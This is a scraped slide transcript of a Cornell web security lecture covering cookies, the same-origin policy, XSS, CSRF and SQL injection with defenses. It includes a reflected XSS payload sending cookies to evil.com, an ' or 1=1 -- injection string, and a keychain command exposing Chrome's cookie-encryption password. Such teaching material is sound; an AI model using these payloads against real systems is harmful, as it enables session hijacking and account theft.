lecture 26: web security - cornell universityhttp basics get/index.htmlhttp/1.1 host: http/1.1200ok...
TRANSCRIPT
![Page 1: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/1.jpg)
CS 5430 5/2/2018
Lecture 26: Web Security
![Page 2: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/2.jpg)
2015 Security Incidents
![Page 3: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/3.jpg)
Vulnerabilities by Year
![Page 4: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/4.jpg)
Vulnerability Occurrence in Applications
201320142015
![Page 5: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/5.jpg)
Vulnerability Occurrence in Applications
201320142015
![Page 6: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/6.jpg)
HTTP BasicsGET /index.html HTTP/1.1Host: www.example.com
HTTP/1.1 200 OKDate: Fri, 17 March 2017 10:10:00 EDTContent-Type: text/html; charset=UTF-8Content-Length: 138Connection: close
<html><head><title>An Example Page</title>
</head><body>Hello World!
</body></html>
![Page 7: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/7.jpg)
Session Management
HTTP GET
HTTP OK
HTTP GET
HTTP OK
![Page 8: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/8.jpg)
Cookie Side-jacking
SSL(login)SSL(redirect; set-cookie)
Request; cookie=SID
![Page 9: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/9.jpg)
FireSheep (October 2010)
![Page 10: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/10.jpg)
SSL by Default (top 10k)
![Page 11: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/11.jpg)
Cookie Forgery
SSL(login)SSL(redirect; set-cookie)
Request; cookie=SSID
![Page 12: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/12.jpg)
Cookie Forgery
![Page 13: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/13.jpg)
Cookie Theft• Malware sometimes targets local browser state
![Page 14: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/14.jpg)
Chrome Encrypted Cookies• salt is 'saltysalt'• key length is 16• iv is 16 bytes of space b' ' * 16• on Mac OSX:
• password is in keychain: security find-generic-password -w -s "Chrome Safe Storage"
• 1003 iterations• on Chrome OS:
• password is in keychain: "security find-generic-password -wga Chrome”• 1003 iterations
• on Linux:• password is peanuts• 1 iteration
• On Windows:• password is current user password• CryptProtectData uses 4000 iterations
![Page 15: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/15.jpg)
Vulnerability Occurrence in Applications
201320142015
![Page 16: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/16.jpg)
HTML<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>CS 5430 Spring 2018: System Security</title><link rel="stylesheet" href="style.css" /><link rel="shortcut icon" href="http://www.cornell.edu/favicon.ico" />
</head><body>
<div id="canvas"><div id="header">
<div id="info"><a href="http://www.cs.cornell.edu/courses/cs5430/2018sp"> <span class="title">CS 5430</span><br />
<span class="subtitle">System Security</span></a></div><div id="logo">
<a href="http://www.cs.cornell.edu"><img src="cslogo.png" alt="Cornell Computer Science" /></a></div>
</div><!--end header--><div style="clear:both;"></div><div id="menu">
<ul> <li><a href="index.html">Home</a></li> <li><a href="syllabus.html">Syllabus</a></li> <li><a href="schedule.html">Schedule</a></li> <li><a href="project.html">Project</a></li>
</ul></div>
![Page 17: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/17.jpg)
Domain Object Model
![Page 18: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/18.jpg)
Same Origin Policy (SOP)Data for http://www.example.com/dir/page.html accessed by:• http://www.example.com/dir/page2.html• http://www.example.com/dir2/page3.html• https://www.example.com/dir/page.html• http://www.example.com:81/dir/page.html• http://www.example.com:80/dir/page.html• http://evil.com/dir/page.html• http://example.com/dir/page.html
![Page 19: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/19.jpg)
SOP Exceptions• Domain relaxation: document.domain• Cross-origin network requests: Access-Control-Allow-Origin• Cross-origin client-side communication: postMessage• Importing scripts
![Page 20: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/20.jpg)
Cross-Site Scripting (XSS)• Form of code injection• evil.com sends victim a script that runs on example.com
![Page 21: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/21.jpg)
Reflected XSSAttack Server
Victim Server
1
2
5
![Page 22: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/22.jpg)
Reflected XSS• Search field on victim.com:
• http://victim.com/search.php?term=apple
• Server-side implementation of search.php:<html>
<title> Search Results </title> <body> Results for <?php echo $_GET[term] ?>: ...</body>
</html>
• What if victim instead clicks on:http://victim.com/search.php?term=
<script> window.open(“http://evil.com?cookie = ” + document.cookie ) </script>
![Page 23: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/23.jpg)
Reflected XSS Attack Server
Victim Server www.victim.com
www.evil.com
<html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script>
</html>
http://victim.com/search.php? term= <script> ... </script>
![Page 24: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/24.jpg)
Stored XSSAttack Server
Server Victim
User Victim
Inject malicious script
1
![Page 25: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/25.jpg)
Stored XSS attack vectors• loaded images• HTML attributes• user content (comments, blog posts)
![Page 26: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/26.jpg)
Example XSS attacks
![Page 27: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/27.jpg)
XSS Defenses• Parameter Validation• HTTP-Only Cookies• Dynamic Data Tainting• Static Analysis• Script Sandboxing
![Page 28: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/28.jpg)
Vulnerability Occurrence in Applications
201320142015
![Page 29: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/29.jpg)
Cross-Site Request Forgery (CSRF)
Attack Server
Server Victim
User Victim
1
2
4
![Page 30: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/30.jpg)
CSRF Defenses• Secret Validation Token:
• Referrer Validation:
• Custom HTTP Header:
• User Interaction (e.g., CAPTCHA)
<input type=hidden value=23a3af01b>
Referrer: http://www.facebook.com/home.php
X-Requested-By: XMLHttpRequest
![Page 31: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/31.jpg)
Vulnerability Occurrence in Applications
201320142015
![Page 32: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/32.jpg)
SQL Injection• SQL Injection is another example of code injection• Adversary exploits user-controlled input to change
meaning of database command
![Page 33: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/33.jpg)
SQL Injection
WebServer
WebBrowser(Client)
DB
EnterUsername
&Password
SELECT * FROM Users
WHERE user='me'AND pwd='1234'
![Page 34: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/34.jpg)
SQL Injection
WebServer
WebBrowser(Client)
DB
EnterUsername
&Password
SELECT * FROM Users
WHERE user='me'AND pwd='1234'
What if user = “ ' or 1=1 -- ”
![Page 35: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/35.jpg)
SQL Injection
![Page 36: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/36.jpg)
SQLi in the Wild
![Page 37: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/37.jpg)
Defenses Against SQL Injection• Prepared Statements:
String custname = request.getParameter("customerName");
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );
• Input Validation:• Case statements, cast to non-string type
• Escape User-supplied inputs:• Not recommended
![Page 38: Lecture 26: Web Security - Cornell UniversityHTTP Basics GET/index.htmlHTTP/1.1 Host: HTTP/1.1200OK Date:Fri, 17 March 2017 10:10:00 EDT Content-Type:text/html; charset=UTF-8 Content-Length:138](https://reader033.vdocuments.net/reader033/viewer/2022060411/5f1083f37e708231d4497dad/html5/thumbnails/38.jpg)
Vulnerability Occurrence in Applications
201320142015